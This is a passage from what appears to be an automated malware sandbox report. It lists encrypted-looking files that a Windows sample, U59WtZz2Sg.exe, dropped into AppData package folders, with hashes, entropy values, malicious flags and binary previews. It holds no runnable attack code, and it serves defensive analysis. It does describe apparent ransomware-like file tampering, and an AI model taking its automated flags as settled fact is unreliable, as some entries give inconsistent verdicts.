SSDEEP:	192:gL2VKO/tlMEB18VJQXBsvELSL1fF5PG+SO4Idh9FimVd+BZuv5:gKjhB6QXpGBrzHFRd68
MD5:	AF01FBBB2DCC64EBBC126FD416D73AAF
SHA1:	53266A127055C2DDDA5C913580C635BEFABAB95F
SHA-256:	C600F8400E2E38549F446C3657ED9EC4BB9965D389125D93984B5D8410B96596
SHA-512:	BE8593C0F3B00632558503E541CEBEBCCB5AD15CD2B0721778FC5C2FE71A5462E919A850F6E0674AE65ACB2FFCDA640156ABA7182611038CC96A4B17E87A8F0D
Malicious:	false
Reputation:	unknown
Preview:	regf..63..%....+)_.....wB..5....A._...u`..5..Z.ty..2.g...1.....M." rA(.l#L&..u..m.]H...HW..=...7...a."_0...x~.l.O...Py.L.,.6.+}%{.y....H.H@.?......4U..^.Cm,.........T.iq..}......._3.t.!.e.L.gn.......&..!&.....=..4...)..H..@GB..FG..z.1<.......m.....E.....=.h.Ws....P..7.}."T?1~B%.....~u.. ...Q....4...3.....O.........mi....B$#...C._...5.\|..r...n..m7R..:.).m..X..} ..x...5K.._.......sK..l<.7....W.u......:4.%mV2A.'...k...(D......~v.J.~.I..?.U!7....v...lS..pf.=...y.X....\..en..=...K.;.......W.^2..#..i...s.....s5V.0`0`..k'.I.....X.2V....y..l.{..`.,..!m.v.-}....P....![..?..n!._.r%D.@Z.s!.N...FK.2>..+.#2.0...a.q..O......I...........y..1&.9...%......J.V..........P...T.A_..j../.......R.QCc..>...7NP.;.oX....D........b./.\.M..Xf...{s....U<'P.(......p...{.B....u.....{..J.T..S.7...!....>t...r..~.p.D.${.?.K.t.m.\|..:...X...+6s.l.lJ...FR.N.9.q..Qi,qt.B.9.2..Z.Y.0&......... r..,$vW%.....,I.....\.3..S..2.h..=C.2r..#).m.@`.'......B.k$:n...:.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.980745826791777
Encrypted:	false
SSDEEP:	192:ksYdWrW4jZvT8tcpuCD6mpHifAPKSqt+KwAwhUT/Hj0jmFqSKKe:kndWrWeZ78tcUCDnpHiUAt9wAwuzjjIF
MD5:	C10B962780888DA00FA94155C4890BAD
SHA1:	36D0A70A034AC516D2051BEA79DC5AA9556C8B2A
SHA-256:	92D357D0A7A07DA71ABA5654FF7055D0FE552AF79B473BDD29010FC5972836DA
SHA-512:	43D7A1F9D59658AAC470B5E988C934CFB61BB20AF45C7ED59E14A1A187D165941966789255DE2E99EA64BE082E689ADADD55995FB1752452611C9F53F3A60564
Malicious:	false
Reputation:	unknown
Preview:	regf.A.......0.,.V. .......(.Cn..,.=...q..Nq..pL...:S..F...]..#....8.U......!....9..;o!...p.1{...........+V.0.......m..4.....O..@..~[,.)Q.'......./;4.@:)G.L.....Mt {.lH.6.Y..Y.....J....y.......G.p...p...=]..,..M{.~...`p....X.{0.....2.%).M<\q.f..0R.V...U.p.yb@..o...i0.I"..S.........l...C.7.H.8 .K..e..bO.z....."..,l.\|.....~.....R..2..f!..c...:....3.6..E.dB...#.C..6@~..1lS.oxT..l.....\|..[.D..8>.T..3\|.....L...q0...j.k@.9...:.q...jsr.y...pW..K...F........h...\|..T..f...aI-bW..qG....Ha.......\|o....A..k.e...>%..6..c.0..T.T}.....;...8........K.`..q...R \|...+..1$D.X. ..O......o..r....A.j...u.F`..... 6\.x1..o.#.E....9.w.Z.=.KF.:.......1..yY..~...J.......`.......".~..J..V..H..t...".........-I1t../....z..3..E.s_.?.W...+...Op.y.-w1.^~&}d~..?.Z ...U.:-...n.LF..m.oq.........d..9a...).....\|$.8..~..i.[.LIgH..<!..o..s.........Q..!_ls.........`...2.....qp<q........u.do...%v.v.L.U^.1j.[...qH.O..Z.j........u...gO..._....$.#...5..K..#.BV.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978978831744669
Encrypted:	false
SSDEEP:	192:kXckmqT1xpx44BkIZ7FKV/QBjd+v8jLYg7lud:kXX9x44BkIZ7RBov8jLY8w
MD5:	30C03440A764B67AD58B794101C62111
SHA1:	F774D95496EAF6D96BC13E6166A47F47ECC6A1C0
SHA-256:	6EEAAF22D0A33C8DEA0660F9F0249B383F88B9A74EBB0199529068CEFC5D83EB
SHA-512:	8833528364A41B511EEF05CC98C785F8E4BBC032F597CDFB829DDA3DCFA51E378E89F8280DECD0A50A8F3B74E85066C6935FB277B6F1E7C370601A7CF42973FF
Malicious:	false
Reputation:	unknown
Preview:	regf.0.b..K=..M.....W.?-h...W......eo.8S....",L..,.....T-...1...].M..{X..+.g;........2/.....pcW....v..&..:........c.G..\|]_t...EL...lx......c..h}...'.....$...d=..n.R....0+..%..D3G....5.{)L3...B..b.@d...4.p...Kk}K..L....[.....vL.S...V.7)G..3...!.F[...RVt.$...."j%.H\.G....I...H..7..fnj]..!..+.2\|..vH..(uN.1I9~....&.MFO....M.4f._A...5.V.....e.M....T...~,F.;....g...!..u\|...... ..s..RD.#.m.kW.n.o....1.a..n...W....".]Q..b.\|w.y.NX." .,<..m....t..yXYs..{.m...;4....r..H?4.I....%.;...-7..C.....7.G.G.._..$7.`.%...#.....k.g..<k.U.=1e....S..#H,<.?...H..a..uA....e....9.\F.(..H.m..:J.l@....i.....+.Kl!U.....$Sp.3..].....`.]>2..I....5.......F,?.....U..dr.}.....C...E..a.pC...H<e..PwJ=.{.....K..w..v...'.=.%Fj..R.i~.....Z...d..V..L...$..ms.5.....l9D.........u.2H[$.8.PW.i8.>...]..t.G.e"...#.%....[..\|..{.Y..b.....H.g`..E..q.....(...X.=P..q...^.......z./!..Q`p.....7n.........W.5..k.....eM.f.;.{W5....N...ua.....:VQ.K...}.M.%.2...\.7sM...f..1.4.r'..... .

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.976125434496166
Encrypted:	false
SSDEEP:	192:hn427Sl3bnz4wbpcLVZldqevWm9Odalv6T0Nfddf+ESt:hnDSNCLVZ28Wm9sK6gjd8
MD5:	F1100EC693A62F6CA24AD3863A52844C
SHA1:	C12B4365D9540F017F271950FB8D2D1600A72BEC
SHA-256:	294CF9A3F33B215DC75AF121B24575E741CF7E9F832BA913A5EBA062FBD88BD8
SHA-512:	16D70D3358E865294B175BB9449BDAD8EFDBF60790F43B3230CEF633092F8B0276A42A65F39E49E8A985AF9B473F18A4AF17C4137685D898842AC83AFA506CDE
Malicious:	false
Reputation:	unknown
Preview:	regf...^.t....$4...;...B..........2...{.~....L4..y....3.6....."-.(>..J....u5.@...jL...1.[V.B<......w#...Y.\..[>..1.....G...Q.,.nC..9iu....q...).......u.g.....G.......5Q....V...:z....\|........5..c..X.k..l!..n......G`..........@...Iu.Q.?...^.".....Z..5....F.&...F?W...U.RY....g]......3...>.&&.b..........L....... rw..v}.Hp.4$G`P.4.:\...4.o...9MbZ...L.m..u...8..,.+..s.......T.....Zp...kE=g.;m.w..}...Sc....eF.\4.&..D....Z...,G..Ig.{....Y..d8.4&V.@Y..@`...H......b.4............#<p. ..9PF..p@..z.{4.;.n..^Sw....$+..V.c...&H........3......Cv.!%q....^.......2.......c.e..u1\G.Z..-Sr..#.....-......>eM....Q...._.B..m..F...'.Z1..._..fP...l..E.\|.........<&O[.2m..^./.L..^.9.M...pLTZm...oe..y.Y....w..rY.5?........O......8bi...HK.A..y......b.......E.t.pj.".ft...#%{Ave..........q......t..R$!.......K.l......f..}...}.x.\|.....#..+'.=~.A&A..b..E......4...E.G.4.../7.0v.*VC....QJA1.2..,...2...u]..b....!NY..........U.a...F.6><..0T.O.z....L....O..JVShc .a.7t5.N..'..

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Features\du.bin

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	2446
Entropy (8bit):	7.925502304105127
Encrypted:	false
SSDEEP:	48:CWJxRqvuXHGyBvGt1ZMP3D45dRyAUNMGr1Fk2J0D:CYTzHGyQzq/DUdRyApGrRg
MD5:	80F1B887FEC3D72B8682FDD5494172C3
SHA1:	9E799F76473CCFBC66E697DFF71E3EC260AC44E6
SHA-256:	85A41149857349BD0C2865861CE8499D402B140D182669B0B6C7F46358F766E7
SHA-512:	996AAB5D5C203502EA3108D9B3A56A4A945FCA4BACDFA2DB0C0FDBD0BE7CA9D5997DA5356A78974BD81F8C464B31F280D9450C3485E5F49F2DD2F19EFC1009F4
Malicious:	false
Reputation:	unknown
Preview:	......+....%~.r{..T.jgI.W..oX.x.\|6Lb..O2J..v`l@.`'..[...E7v...Iz...R.s=.?.F.E...`.....u..g6.J...>.M.....8....{.I....`8...G.Wb..s....%1..?.G_.A.....a-2..".9....L3C.........Np..@>..f.......<.........\|3....w0......)c.I.V....#.A.......>.5H...ns.a`.j.U.....@)....[E....+.}3)....Y.~.n.E.....V.d...,{....a.(k._..:@.U.IxQ0...x.A.B...xrL.vz....?K..D.....8..tZ+.@.M..>`...K..oj.y&....}j{.~_..\...V..c..d.....Pm..j.~OY.{..J.m.N/^...^..;......7.i3.0.4U..\|."....-...6..v../.;.. .:...RWE..B.][..;.(.>...%.....Fz,1.E.NU..bP..g.b...oa..&2^`........E..xi..`V?...G7>M.M.'.....(.../...E..dI...T...BL....i'.Sj$.....u.T_.[$/..D.4...(..-......o......\|..`..6&..mu$.,.....:.P..$.E......[.g...@^.._.....j....C.Q..^$A..8...=..Kb2<.F.W.....Q..4..d.UVe..}.k...a.,z......;/8....z.6.(..._:..I.K"z.)`z..3..-ZG_.ga<Y.Py... ./b."../Q...:.AU.{..le..&.#.\.../..3..V}.b.....$.(.,[...4hf.6.G?..KB..Z..K.h..,&':...9..]...o.BM.OH....*.md....q.#....N.Y.j8.S.n..e.........c-S.W...

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	65870
Entropy (8bit):	7.997255861088143
Encrypted:	true
SSDEEP:	1536:dImUVymSmvZ66SK6XvKxQV1ARyeg+kbFkR0NgYs2fUKTmSfm:imU8mDh6nK6XvKxQVuR5RHQgJ2fJHm
MD5:	8DCFA8C634F8D7EDDD468F793986B59D
SHA1:	CCCF9D1A2F9EC630C2072656C5882B3DCBA699B5
SHA-256:	A09656A0A71B0CF48BB21FA389A4BD28DD57A7478F31D86FDDA0A960AD1D8790
SHA-512:	FF622148874F95770E5290A2E6934BEF7E68E74A9A8219F5D7D8429CB74FE13D09C22D832E11C9DC7035ECD95CAD73235AEF77214E0FE32498FB4FD8DF44ADC7
Malicious:	true
Reputation:	unknown
Preview:	regf#...n~.9.f.U...6m'..a3ZMb...._..#..7....w.1L.\|4.X...n... ..}.c2L.BT'.....i..D:..w..%G..89n.E..a...9.)....m.tre7..83a...n.Zz...G.3......D...OI6X..+c....AI.s...%.1..s.oF.z.R.lE.8...s.......@.z..Ou)Z.wX.........&..M{^e...>..h._z.....,.......&".V6H..U..K.H6..X`n....S..R\Q.!_{{M...X..RfC.9...g.-N..oS.....=....`..<..w.)..V.(.^.BN...acE.L../...,,R....9...M.\|NS2\F"....Dpw.5.V.5..?....n.F.#.Rvd?.....~....z..H..$f.w..w.}i./T.?.h......,..ME-t.!+.7...........'......@.Lk.3..a.".h..2#.3..5Zrp...e....\|_X.,Sx...P...._.z.."......l..R.<]..V..S,9a...v....p...?..Ah..g..B......jJ....X.Yses..y",b..1.....MR.{:U[.a...-.k..{_;...F..u.....L....yW..US...?..$......i."....(.FY.RM.....0.?.`.mg@...&.i.xdrv.....a&1.{..~v.{....f.:N..o..Fr....P.....A)..KD.v.9<..:Gj..!......n..V.R>.Ol&'mJ,.%P.JG+Z.JJ.u..B....b..._.T/Y....p.....t.$...GV.@!w.s2Z..../vJs..>..D1...\|H......,&.D..`....F7....ur...".r.:I..mc..W,n..%. .w<.....l.h... ....j...N.f.+.....(..D......S.n._.EF.C

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG1

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	74062
Entropy (8bit):	7.997457265178655
Encrypted:	true
SSDEEP:	1536:DbCLrMcU3a/4WsMjbBMvZD9oR6u/D6998MQrox6sspCB8fpcoQlr61k:DbCLrFUqQWpqXo8mu6zeUpjMG1k
MD5:	D5909C2A4D65D1D2876DF5E12C5CB5B6
SHA1:	DF07653E7D07C26DFB7DFDE12C17C705FF76287A
SHA-256:	1A0759FF4EE8DDA0470F283F0B9A721CFBE37EA6FA7653423FFAEF2250591B74
SHA-512:	2C63016986F7E735259E2453EC451C7010F913F55BCA038629E4F1EE28AC41A707AFF6598A7ED6AE47B242A4D77A23DE3C7632B2D852837CEC75C6D0AD311B55
Malicious:	true
Reputation:	unknown
Preview:	regf".K5.>._DE3...%2.M@...b...r.pS...xz....u"/...3........,....e...^..pZV?./i.j..%+a..JXn......Y$f6y..R.d6M...2`...:.o..y..%...8N?k.&L]w..2.{mD.H]...'.I.X.....G)...%..x.r.n,..N..`...U._[.G..C.%.O......(.?....92f[..:...TZ.`6j.p....6..Q..3.e...l.r....8Y..wYr.,....D........x....7.>...UU.',{....E...k.......c.......H].Y..9....8..f...;8.q.=.n....\Y..F.A.86....1.....K".dS...4[".v=<y.....u5...b.........S?U/..]{.$O.E2..\.=.`.5..m....ue.vC..0i..G.R.a.CM....b...0.~...&I.r>}.h1..w.4..>....W...T$Uc.sV.I...C..\|e.xO.~..N....&..}C..)jL....vs.5..gc..z.....&.-.....a....d7.I(..U.z-r../....W..S...U.f.n.]....L....q=;@:F....z..%.Eg....S~.i+..7V.]...M...E?..&.~..ZTJ..`.7h..o ..\.)7.z..H.....iA.U.:.....T..%..).....a.\P..-....._,...j..t..g.~.....p.Nc9y...w....o\...3..V...r...a..y...7..j,t...c>-..x.tC9.\m$..y_..%..g.JO;.'.0..*j.'.ZA...K&.....6....$.f....].`.y....e._{.y....8.....#A..e._V.Iu.W............a..,.XJ.%[..A.Q...(Z....0U...d.1.V.L.....x...%)<...b.)...y8~].k

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	46332
Entropy (8bit):	7.995847459947025
Encrypted:	true
SSDEEP:	768:/mPUS8XwfEfkC5a1S38B++/P8llUzCE86r6xLydvOoN+EbZav2suGE6Bm43qIz:8UYila1GwElyCJ62cdPb34/R
MD5:	CF935970074742DFC90C74737C204F72
SHA1:	74F402584C8C604FE06B782F95205527E02F0D3C
SHA-256:	474E3FA12BDE4A6E90CBFA7F7E03393C7CAFBC2786532E5E1C18850793C780F8
SHA-512:	D4EAA90C4D920318EB6B3C314897301EF018474FF2AB13F49234173494B780505ABFB97E6148535571C70C25E9A19193B02731079E7B37762A6359E4708ED1BF
Malicious:	true
Reputation:	unknown
Preview:	.varH...'.%.I.m.3Q..G.....g...../MC@..<.2...2\....i.<.m_..7...z......\.TmV...V...F.....m..2...F0C...Ep.. .".NY...U.(ep.$.{.\..i..z.L..8.\|.[.+{.}......O....[!.....Oh.Lq.~...bxO..f..h..Y...._O_I.`..R.H)..~.P..._.`.L..4e4.O>.......=...6..rn...f..'.."...UB.E?....rS...();l.y...#..O...Vp....=.g....v........,.l...1y..'...j6.#r3/.!=.@}...l..Z..4.......5./............x..q.6Y....qb.".....4.lC..E.aV=. .-.R..X..#&...?o.....l.g..N^..#.....}..?Q.....)...oO..$?..)78.."Y..k....."...5.rF..lu..C..V2.@krvmg..^.......!#..K.C...3I?...bC-...+....b.gh....lNu.t[A.u(......'..R.V.Cq0f:..........'0J./o...q"..^_<3.. .&.R.FYF?.c....),J2)..<D.P.e...\....{.6...v........t..}9..._..v...bJ.P!..EX\|F..v..5...k...7. ;T...Ja\|(.V.;g.%..[..,.w..=R.8....H..~....n.+..`5...I.....-..k.Rh'.@.u.IB.0.S......J0.....x.x).S..j">......w[N).h.X....3.t.r.{c..._.:^.....'Td.E.z:..a......2zgC..W.....Q.Lm\..0.Z...X=...s.Oi.8L.f...I/....*......t3..(...Zx......PKk(c..\|.g..m........j

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	137910
Entropy (8bit):	7.998558402266803
Encrypted:	true
SSDEEP:	3072:aDNMO2vq74fGvZkPM9RxFmcY4pFWKjslYrvFi/KwhO557tXyz5aS8A4:+NtM4eE9TY4uKjsl4U/jYkFqV
MD5:	8B833BDF0F33F1E190BF5DF878600AB8
SHA1:	580435B4CAC22A769D79D597DDCC71CBB327E076
SHA-256:	EC4A644FAE6658060C3A92EC5F447D9B29EE40FFA388AB463E9822D428EA37C7
SHA-512:	63FDA4BE91B178ECF0401E4F827C7F6112BBA4CEBD7310693C1E61D08CD66C46B0EA1D2ABE7B6B374B806917E0A40A551C4870DC8610C48567C073EAD1173115
Malicious:	true
Reputation:	unknown
Preview:	.vaJ...;..G..V_.t-....n..$.O.z....j.=....{v.y..@.S.T......<u.L.8.)q{......@RN.2i.sg.....&(..!.p.,`..F.+.{.{...F@...@..8.5-...3..\..M.e.-=.....q.J.y.+.."..o.@..9...vA.%/.4H}k.&)v..l..z_.g..5..c&3S....b.Dp).io5...S.U\|.,5..P.a`........u.7O.g..e.Sm..z.a.a0..E.vb.j..........y.J<.;...c....?[.nR..P.`..a.jQi......Q.....].t.F.....".-w.s@r....h.F<..9$.Z..b...D.8u...).#Z......C...M......\.e{hR...A.6.@b...rk...J...q=8.".Pq.%..m..67...,.....u...=So.7...3%.@. .&y..Lx...9.V...k2..w.........".+m`.t.h.Ut.<7T.Q.+/......>z.Yy.Ll.5....g./r...2R.\|?.C}.G...o........v.REv....i...Y@...%.%.7A.#.P.....J(..:l.~'...i.@..h.....0.\|Sj.XJ.!abCY..L.Bh.....0...F.I.[..j.....=..U@...{.y=..T...p.....l....P.S..Z.....6lp.'r.P..V.I?........l.FQU.l...Ho.W....E.2..~.yU]P.f.v....Fn...8...C[;..[_.&..M^..{l'`.g...5. ./..o.n......,H..<.f..]....{.e..h..8.v-....~m4f.0.i.....<....._.u.S...@]...o.G.;..3m..yC..D..B.......v..cV.2..e..G..9"`...`....a]5<...,.b'.".....'.a.[.......O,.......a<.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	35314
Entropy (8bit):	7.994630271424532
Encrypted:	true
SSDEEP:	768:+zN+SQD2dYz2kE4axHomtFwoUuk5cs9H+GJ0jREJE9:CYSQD2cBEVbFzAcoHMj+JE
MD5:	D6B2DCB86DC36616A1CA27220F6CA91A
SHA1:	D8115FF94B5E4D8C39A252118250CAC42ADA6F26
SHA-256:	175FDBCEF3A4D1647B581C3D2F84BFA4FC2F5C005BB8E8CC0F3B0C0C46BAE8E5
SHA-512:	5D0C89C32CBFCB321A90B5BC06C2164BC37F2E83D8A6363E83053B7D1CA1C31BDDADE9CD9F082EA32340BF9915C97055D20952E262C85F0AD83EEB989E495D2B
Malicious:	true
Reputation:	unknown
Preview:	.va.U..G../J."WH"..P$..C./...#.~.t$+}...n...t.......D..N...S..(~......Y.......-.`..^..B.5;....<p`.P....J.)Rd...&.l....a............-^.h...:.>5Gr..L.(.....e.H..?..W...'@-....R..8.U.s..\+.]C..~.\|p...e..K..,........#.........CeF.[..;1I. ..H.NRr....Y~.....D..!...c.=.....$N!..7>_.t..9..g;."....9..........-......}.)Y.u.T..x....J=...us/..h..h#.h.s....\|~N...'.>.D..x....Y.....d....d!o.....z;W.....9....%<.....t...@.8..0..N..O.._.DI-y...[.g+...n....-..!....TQ..:n....Y....).u......fN\|......$y..D!..Xqz. .L...dx=84n\|...o.+..hc..:j.1..<;D....--...2..9e+..o..-.A...HG... .p4./.w..._..'..0\...N.d...k..AQ...a.j...\|2n.....e.=.{/[...7D.........&.......I.H.Ay(....3.='.....9.a}....M-Qsn.c.C..?-?....R#.txu3...;d..UG....Q0.. l..dE.I'\Y....OaF?...]..%.......N.....j..\|....#LN..XwB.....-...~.M.a'..r?.U.}"=.<....E..d...7Q.++.r=..d..#.t. Z t....-.......p....2mvP......^'..,..xu{g.G.z.;..@..!.[........"..e....+....3..V.."-...[.. .2..f.+7.c.2(.j1..6.W..~..... :..

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	16279
Entropy (8bit):	7.987163322185845
Encrypted:	false
SSDEEP:	384:DwdX0FF8rEASZbmi9Hfc5GGQZOHdRW/w7sV:2XSOrqbmWHfOCOHdRW/wm
MD5:	301B93E17B8E83BBFBFED22FDBC280CD
SHA1:	EC314EFEF37FEDC5F7B63B97449C4F1095035E54
SHA-256:	373DCD4513D6FE3C18965CE5E8EC678B71279B994965404674FA4C7D146D797F
SHA-512:	7F02AF00C2AB59A73C3C1CFD22556C861690FF6ECB4ECAD10C38A6C3B62DC69D23329F38BD8460CD07C503E1DAFB8A01DBDEAD99DF623A91B9D59DF2B7855FA3
Malicious:	false
Reputation:	unknown
Preview:	.va]...u..t...M..iL.z.~...k..l.[....Y.O.S`..I$[LY.Jof..p.s....Q..2(....Bk....U..Rz...EJ....N.^j.......DN...s...Cx.......0..b.F.Yr....:.S2.Y9.u....d...P...fu6.'.j......na.R./.\D.O..#..T......R..u..6Z.5;.a..!h..1.R.Mw.E.g.8...jD..\........x6.$%N.`.y..xd.........\|.!?.">.......2.NG..d..z.Mx..M-h.h.,..r..4T.w].....s...E/..... ..E....1.2.wNH.CMS.B..n..,.^?.4.?.F&Q...jV..r...^.z.....D..!J...!6.>z...3.#r..7....G!...y..`aE.t[>...Z..W.F..u.D ..y2.R...).C.Q..r.p..dW.9j.s...B...h)...,..L9....=m...:........%......B.f..;......eB.3....l.wi5t..<...+...h3f.E7..s...O@..."..&Pn..}evW##....^..6.....P4w.06..>.....c.km.3@.di..x&...P...N+.`M..2.1. .R...U.6.....V^f..L..s.....4..Gb#..4.\yLU...%...6U.r.l...X../..L...4.m.'..8.?^h.....L.e........0.g...#.>H.k..j\....8...]cgl.i6...r.,@i.G...Y[....*..r$..K..1B.+..Y....-.t.t.3.....D;9#'.f.n....".7...6K.P....4./....a.X..[."..F.O.....j./..0.I....X..'z..O.X...w..x.o .O7z....,.X5.&n.....'...".6.Ao...C.......o.[8.d...;

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	39440
Entropy (8bit):	7.994894747932445
Encrypted:	true
SSDEEP:	768:m8jWsB+OjqTGygHJyISQsQDQGPSgItro+xHDWs3X4MPCQyNmMNt4++:m87B+OL0JQDJPSTtTV6c9C/NS
MD5:	E723AF35394885FB746B9414EB38D1CE
SHA1:	463B059F885006006CB216557923423E9CF835D2
SHA-256:	762DC6E1E895B47E33644A26ABE197AAFE660C48DC4197ED5E0393E1BF46C580
SHA-512:	48457582E1CCF776F183B1D2CB9C4AFFA86257A180F46603AA70A1E12D57FE970616B1098908BFB8567D7AD49454A4C4002302D2F2CFDBEDECCB9FD8C90EF471
Malicious:	true
Reputation:	unknown
Preview:	.va..j.o6..X6...?...X.}...#.p.E..[...xMJ..`)d.%..A:I.h..M.z.QU............-H.=.(. .%&je........FivFhG.'..O.w's.....k .&!)8..V..."T.Sy^...(;37wt?..]4...".V5/~..~..T.5.ui.tw...^H...R.=.F..._....<.......!.._...3....G.c.E..R.qk.e..^1.P......I.U..@.]f..H.?\|.0._9^.@.`......t7.!z._Re.ocS\.W....k.P.:.T...g..GL..B.X.A..Xn.U/z.e.MW.tS..Ko......9..........;...n..1.. [...x.-~..m.f~o..^..q...=.~...._....E}.4...9.......H....y8....`r.H....%Cpp.8.G2..y...p.Gv`... .'y...GS"F.N..a0.F......V.Z.M..&.3....y...h'.......?,.y..tu...."]u._..}..QE.H........w...b..."U..T'.GC..`...~....:Ih.........~.!g...AV..:..<.....9.}s...K..z..D.e.7Y...x~1`{K.w.mA..S.._.....W.8.a..p....K..].+T.lJ1.:..9.jD.7...9.......R....f.V.X."...;...B.:9.....t...qv.d..oXJ......U..w.s.6\|H.{....Q?&.. ..T......^..%.\|K=.M.^...x..e.?b-.[&.#d.U7:....k..\|....-.X.3..o........os.....Y...q..N.r....kf.X<]hQ.n..m...+2.c.p\|M..W..L{%Hg...S...}.z....o. ...p.jW...^r.y...vI+.8... ...N*..\...hN,

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	7010
Entropy (8bit):	7.974615771368991
Encrypted:	false
SSDEEP:	192:9f5+iWKtbrh/xhORNaVWeBUI/M5muSUrp9FLkwye8Mh:9MWJ/xhOzogIQHt9FLkwyJMh
MD5:	4D54D204E140087B14BB240D25D9BF58
SHA1:	6D56464656930696308F136963FDE3EB820C2388
SHA-256:	50F6B8DF77EA41D677A30220DD9334AEF0A09ADA44B06B0310901463760631DB
SHA-512:	9D9081554E59E097734C96BC45C8D0B67496EA06B98D5F55F16F637439836425137A04896717C8E253EE1BA4772BBE96ED414A32836F5A670D93FC7512B9D1D7
Malicious:	false
Reputation:	unknown
Preview:	.bot........_t.I...L...f..f.GIF.k.<!..%Q..^.UIq.....of....F.....+^....MH.:..9U......E..........Fw.'.r...$.eV...j....... .B..;_..?.w....z^ar......Y.g...)-,s+......\|.+....2+....E..^.o...........+xn.E~..9.p..7.f..Z..q.....Xm.bq.j..p....J....j...V...........s....Gz.t.4C>]`..G.@.X....\|........y..&..w..h...&0..Y...2..~.9..I....O........Y....>.......2.i.SC..@..!..\|..N=).x.}.."_..._.~.C.Q4...$...-..V.T..P.......^....4.F.&S.\...1.#.......=o......lu....j..u....._X..C..7....G.n.9&.h.&...dU.4.@Z[%.H{.c..h.-....=.^c"A1.....U.s...a...=....N(P.\...a..../...k%o~.o.:......1...~.......;M.Y"....<b.e.....z..H..`...I..@.Q.\. .Gc..~..C..a_;qfu4`...I%..a{X.}....3.e.rBs....V.......E....&...;q}v.O.+'.2...y[....e.uu..4M.s8Il.3Kh.C..H...4m.!....o~s..&O.).sH........ ?.:....v.Q..P.ny..U..X..?#.:yJy...?...\|....6.Z.........a......d.3?.b_+.~..].Z.FJ.m0b#H."....ih1...V...a...Xa..A.dVM......lz.{a4...i.L...f..........{./...$-..W.%..b..R..!.)4..M'....[.V

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	6921
Entropy (8bit):	7.974555311743721
Encrypted:	false
SSDEEP:	192:daX2F9Jl6I9CjjxcjmvNqskefWRGj1+c2xR0N5:daX2/p9CjPN6RGj1+3w5
MD5:	A477E9D2131DF3EE33ED353978BC6EED
SHA1:	22CB95427691EAC3582A721A51C8E4CF5103B080
SHA-256:	98DF3F6627D526FE3C80E9F95AF8BD1428E3F391F51A0F4A719E3FBE74484C87
SHA-512:	2CDCE1806F5332BAFCB7A309CB0A9BBAD27A4D2F984499B65635C501A40455EE9E3C4B1B4B0F258F38DA4463667B754A32D1A317C1D4ECDBF577906DC635BE9D
Malicious:	false
Reputation:	unknown
